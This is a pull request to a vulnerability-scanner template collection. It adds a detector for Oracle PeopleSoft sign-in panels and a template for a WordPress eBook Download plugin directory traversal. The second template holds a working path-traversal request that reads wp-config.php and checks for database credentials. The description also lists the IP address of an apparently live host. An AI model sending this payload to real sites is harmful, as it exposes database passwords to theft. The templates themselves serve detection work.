### PR TITLE
Added oracle-people-sign-in.yaml

### DIFF
--- a/exposed-panels/oracle-people-sign-in.yaml
+++ b/exposed-panels/oracle-people-sign-in.yaml
@@ -1,0 +1,28 @@
+id: oracle-people-sign-in
+
+info:
+  name: Oracle Peoplesoft Sign-in
+  author: idealphase
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22
+  tags: oracle,login,panel
+
+requests:
+  - method: GET
+    redirects: true
+    max-redirects: 2
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: or
+        words:
+          - '<title>Oracle PeopleSoft Sign-in</title>'
+          - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"'
+        part: body
+
+      - type: status
+        status:
+          - 200

--- a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
+++ b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
@@ -1,0 +1,29 @@
+id: wp-ebook-download-lfi
+
+info:
+  name: Wordpress eBook Download < 1.2 - Directory Traversal
+  author: idealphase
+  severity: high
+  description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
+    - https://www.exploit-db.com/exploits/39575
+  tags: wordpress,wp-plugin,lfi,wordpress,ebook
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Added oracle-people-sign-in.yaml

### Template / PR Information

Added oracle-people-sign-in portal as shown in attached file.
[<!-- Please include any reference to your template if available -->](https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22)

- References:
[shodan](https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22)
### Template Validation

I've validated this template locally?
- [X] YES


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:
example URL from shodan
https://20.62.119.206/psp/FSPRO/?cmd=login
<img width="928" alt="people-soft-sign-in" src="https://user-images.githubusercontent.com/12832679/142808644-fb2d48d2-31fd-457a-88fc-992527afd415.png">

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)